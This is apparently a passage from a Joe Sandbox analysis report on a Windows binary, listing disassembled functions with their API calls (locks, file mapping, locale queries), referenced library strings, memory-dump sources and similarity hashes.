                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Acquire$Release
                                                  • String ID: first
                                                  • API String ID: 1678258262-2456940119
                                                  • Opcode ID: 9530931974fbb650229457faf3b6c06667e19c7ab52fb30a1225855a9ab51df5
                                                  • Instruction ID: 7d32bfa01e75aad31cd08123361e01c0faa5a494293601fd841b219a027b0241
                                                  • Opcode Fuzzy Hash: 9530931974fbb650229457faf3b6c06667e19c7ab52fb30a1225855a9ab51df5
                                                  • Instruction Fuzzy Hash: ACE10072A043018FC718CF28C89076AB7E2BF84354F19816DF8899B392DB75DD45DBA1
                                                  Function 00D47050 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 227fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileMappingW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00D4710F
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00D299EA,00000000), ref: 00D47120
                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00D299EA,00000000), ref: 00D47159
                                                  • MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 00D47257
                                                  Strings
                                                  • ..\..\base\files\memory_mapped_file_win.cc, xrefs: 00D47095
                                                  • MapFileRegionToMemory, xrefs: 00D4709A
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLast$CreateMappingView
                                                  • String ID: ..\..\base\files\memory_mapped_file_win.cc$MapFileRegionToMemory
                                                  • API String ID: 2231327692-2123313340
                                                  • Opcode ID: dcb1fdc40bac4cc623b9f5cde4cfc4a1d042ce8d8cedecb967fb87ce61bc6c7d
                                                  • Instruction ID: affd4879840f78b36d75868175078cfc30027506842626c8bcd67232df729c16
                                                  • Opcode Fuzzy Hash: dcb1fdc40bac4cc623b9f5cde4cfc4a1d042ce8d8cedecb967fb87ce61bc6c7d
                                                  • Instruction Fuzzy Hash: A871D1716083029BD7149F28C891B2BB7A6FBC5324F144A2DF59797381EBB1E805CB76
                                                  Function 00D32270 Relevance: 10.2, Strings: 8, Instructions: 212COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\vector$__n < size()$bucket_count$max$min$type$vector[] index out of bounds
                                                  • API String ID: 0-596577333
                                                  • Opcode ID: 1964d6e9a857a264f04cd7644d54a80ac9bf10f3066f0924debfd4fd7ba65d4e
                                                  • Instruction ID: ae2d87887c404af6247e2548657f8f9747493947a8df7601437c015b32dd0af3
                                                  • Opcode Fuzzy Hash: 1964d6e9a857a264f04cd7644d54a80ac9bf10f3066f0924debfd4fd7ba65d4e
                                                  • Instruction Fuzzy Hash: E571AF71E0021A9FCB14DF68D8919BEB7A5FF84314F148129F806AB381DB71AD05CBB1
                                                  Function 00D5A300 Relevance: 9.4, APIs: 6, Instructions: 392COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(00000000), ref: 00D5A45C
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 00D5A519
                                                  • TryAcquireSRWLockExclusive.KERNEL32(00000000,?), ref: 00D5A54C
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D5A5E4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$AcquireRelease
                                                  • String ID:
                                                  • API String ID: 17069307-0
                                                  • Opcode ID: 9c6f2722cbd1b9dc3621195faa84b10698daffba7afb4e0e6887275454179d56
                                                  • Instruction ID: 2e59750f89d444d7de269b031a15c726b5d32dc08b4971077bc0509ec8d2b34f
                                                  • Opcode Fuzzy Hash: 9c6f2722cbd1b9dc3621195faa84b10698daffba7afb4e0e6887275454179d56
                                                  • Instruction Fuzzy Hash: B8D11171A007669BCB14DF68D880A6EB7A4FF84315F54062DEC868B741E770E949CBF2
                                                  Function 00D45E30 Relevance: 9.0, Strings: 7, Instructions: 275COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D45EE5
                                                  • __len == 0 || __s != nullptr, xrefs: 00D45EEA
                                                  • string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D45ED4
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\string_view, xrefs: 00D45EF4
                                                  • __len <= static_cast<size_type>(numeric_limits<difference_type>::max()), xrefs: 00D45ED9
                                                  • GenuineIntel, xrefs: 00D45E92
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D45EF9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\string_view$GenuineIntel$__len <= static_cast<size_type>(numeric_limits<difference_type>::max())$__len == 0 || __s != nullptr$string_view::string_view(_CharT *, size_t): length does not fit in difference_type$string_view::string_view(_CharT *, size_t): received nullptr
                                                  • API String ID: 0-3844843655
                                                  • Opcode ID: 6b151650015750560903b066287bdbfd3528208f9c2c4ec6ed2abdbdac6777c6
                                                  • Instruction ID: a71e78078a5d84dc1e9fc2464016323f33afd8a1dab5adede3cc4adea3293864
                                                  • Opcode Fuzzy Hash: 6b151650015750560903b066287bdbfd3528208f9c2c4ec6ed2abdbdac6777c6
                                                  • Instruction Fuzzy Hash: 4B91F371E047458FDB18CFA8D84179EBBF1AF58310F14452EE88AE7382D634EA45CB60
                                                  Function 00D2CC60 Relevance: 9.0, Strings: 7, Instructions: 219COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • !empty(), xrefs: 00D4C39E
                                                  • back() called on an empty vector, xrefs: 00D4C399
                                                  • __location != nullptr, xrefs: 00D4C3BC
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h, xrefs: 00D4C3C3
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\vector, xrefs: 00D4C3A8
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D4C3AD, 00D4C3C8
                                                  • null pointer given to construct_at, xrefs: 00D4C3B7
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !empty()$%s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h$..\..\buildtools\third_party\libc++\trunk\include\vector$__location != nullptr$back() called on an empty vector$null pointer given to construct_at
                                                  • API String ID: 0-751371438
                                                  • Opcode ID: 514dd21145011a1fa0e5ec482a61deef9cf3a228ae8d74b0ac2b70a7b570dd72
                                                  • Instruction ID: 8285036b9c5b8760a9127698a7c4b68533352e9c6fe93b0392a1ad42ca561c75
                                                  • Opcode Fuzzy Hash: 514dd21145011a1fa0e5ec482a61deef9cf3a228ae8d74b0ac2b70a7b570dd72
                                                  • Instruction Fuzzy Hash: 80610171A112058BCBA08F58D884A7AB3E6EB95304F589539E94BDB345EB71FC01CBB1
                                                  Function 00D46280 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___from_strstr_to_strchr.LIBCMT ref: 00D5956D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ___from_strstr_to_strchr
                                                  • String ID: Genu$OPENSSL_ia32cap$ineI$ntel
                                                  • API String ID: 601868998-3767422159
                                                  • Opcode ID: a62fa919b59be63375e0e85c677726117954f6344d237ecef75845e014d36e38
                                                  • Instruction ID: 44229bdfb68e5d84e8f862d813edb006ec8eff496b67f838c0a8a92d69a6fafd
                                                  • Opcode Fuzzy Hash: a62fa919b59be63375e0e85c677726117954f6344d237ecef75845e014d36e38
                                                  • Instruction Fuzzy Hash: A24105B2E0524587EF2C4978AC7537EA6C5ABD0336F28413EDD26D22C1E934CD5982B5
                                                  Function 00D34DD0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 103windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FormatMessageA.KERNEL32(00001200,00000000,?,00000000,?,00000100,00000000), ref: 00D34E73
                                                  • _strlen.LIBCMT ref: 00D34E97
                                                  • GetLastError.KERNEL32 ref: 00D34F0B
                                                  Strings
                                                  • (0x%lX), xrefs: 00D34E88
                                                  • Error (0x%lX) while retrieving error. (0x%lX), xrefs: 00D34F13
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorFormatLastMessage_strlen
                                                  • String ID: (0x%lX)$Error (0x%lX) while retrieving error. (0x%lX)
                                                  • API String ID: 2706427827-3206765257
                                                  • Opcode ID: de0871e7f279b26e501cbf66183349feefb0f8c0c5817c2f0652a677e4ddbf2b
                                                  • Instruction ID: 87ee49a1fa7aedcbb12a795bfe242b4cecadb109b62d83b1bfa628baa31cee37
                                                  • Opcode Fuzzy Hash: de0871e7f279b26e501cbf66183349feefb0f8c0c5817c2f0652a677e4ddbf2b
                                                  • Instruction Fuzzy Hash: 0C4175B2D503A996EB109B10DC45FE9B734FFDE310F144395F98966242EBB85AC4CAB0
                                                  Function 00D7FAF7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000006,2000000B,00D7F4AD,00000002,00000000,?,?,?,00D7F4AD,?,00000000), ref: 00D7FB90
                                                  • GetLocaleInfoW.KERNEL32(00000006,20001004,00D7F4AD,00000002,00000000,?,?,?,00D7F4AD,?,00000000), ref: 00D7FBB9
                                                  • GetACP.KERNEL32(?,?,00D7F4AD,?,00000000), ref: 00D7FBCE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 97776f955e97ff5e38a816f949d94d85b8ba64e0aeef8140bfdd475f633ca1fa
                                                  • Instruction ID: 4d9fab7e866c232cbc9bcb98b16f4b69cb7924c9602fec02917ec7b95cacded4
                                                  • Opcode Fuzzy Hash: 97776f955e97ff5e38a816f949d94d85b8ba64e0aeef8140bfdd475f633ca1fa
                                                  • Instruction Fuzzy Hash: E3218E22600201EADB348F24C921AA7B3A6EB54B64BAEC475E94ED7214F732DE40C770
                                                  Function 00D45380 Relevance: 7.7, APIs: 5, Instructions: 204threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CloseHandle.KERNEL32(?), ref: 00D453B0
                                                  • CloseHandle.KERNEL32(?), ref: 00D453C5
                                                  • GetCurrentThreadId.KERNEL32 ref: 00D45415
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D45483
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$AcquireCurrentExclusiveLockThread
                                                  • String ID:
                                                  • API String ID: 436005173-0
                                                  • Opcode ID: e65fbf9ba2d0219350787041bca88b31dfc71ba791c5b16b85572c4284b40b40
                                                  • Instruction ID: 72daaf25207c257615d73987649f7f47fd4251ae5685059741c77e4bb49de376
                                                  • Opcode Fuzzy Hash: e65fbf9ba2d0219350787041bca88b31dfc71ba791c5b16b85572c4284b40b40
                                                  • Instruction Fuzzy Hash: 4A612370A006099BCB04DF68E884ABE7BB6EF85310F484528F8069F396D771ED11CBB1
                                                  Function 00D7F377 Relevance: 7.7, APIs: 5, Instructions: 182COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00D7AA4A: GetLastError.KERNEL32(?,?,00D693ED,?,?,?,?,00D72E9C,?,?,?,?), ref: 00D7AA4E
                                                    • Part of subcall function 00D7AA4A: SetLastError.KERNEL32(00000000,?,?), ref: 00D7AAF0
                                                  • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00D7F47F
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00D7F4BD
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00D7F4D0
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00D7F518
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00D7F533
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                  • String ID:
                                                  • API String ID: 415426439-0
                                                  • Opcode ID: ab05b2e01185ff7ac190de3d5af6e45af7ecac0233a44e39afce611fb829f7e9
                                                  • Instruction ID: 6b23019d6cfb822c29541fed5cb9dbc8ad234cc1bc3a26c8083cf98a80af433b
                                                  • Opcode Fuzzy Hash: ab05b2e01185ff7ac190de3d5af6e45af7ecac0233a44e39afce611fb829f7e9
                                                  • Instruction Fuzzy Hash: A1514C71900216AFDB20DFA9DC41AAA77B9FF08704F18857AE919E7190F7B0DA44CB71
                                                  Function 00D31470 Relevance: 6.6, Strings: 5, Instructions: 355COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • vector[] index out of bounds, xrefs: 00D316F2
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\vector, xrefs: 00D31701
                                                  • __n < size(), xrefs: 00D316F7
                                                  • Histogram.MismatchedConstructionArguments, xrefs: 00D316CA
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D31706
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$AcquireInit_thread_headerRelease
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\vector$Histogram.MismatchedConstructionArguments$__n < size()$vector[] index out of bounds
                                                  • API String ID: 1281622111-748511
                                                  • Opcode ID: c5168a2b76acc995a704e55b2b4e18deb5fd0170f70df1a925964d2a6bb25bfa
                                                  • Instruction ID: 0c6a1590492e571b8ac2de66af3f0178690e9b6c48fe8eadff8f3f29ce407f76
                                                  • Opcode Fuzzy Hash: c5168a2b76acc995a704e55b2b4e18deb5fd0170f70df1a925964d2a6bb25bfa
                                                  • Instruction Fuzzy Hash: 39C18FB5B0020A9FCB24DFA9D895DAEB7F5FF88311B084529E85697341DB31E905CBB0
                                                  Function 00D4A390 Relevance: 6.6, APIs: 4, Instructions: 564COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D4A742
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D4A7B5
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
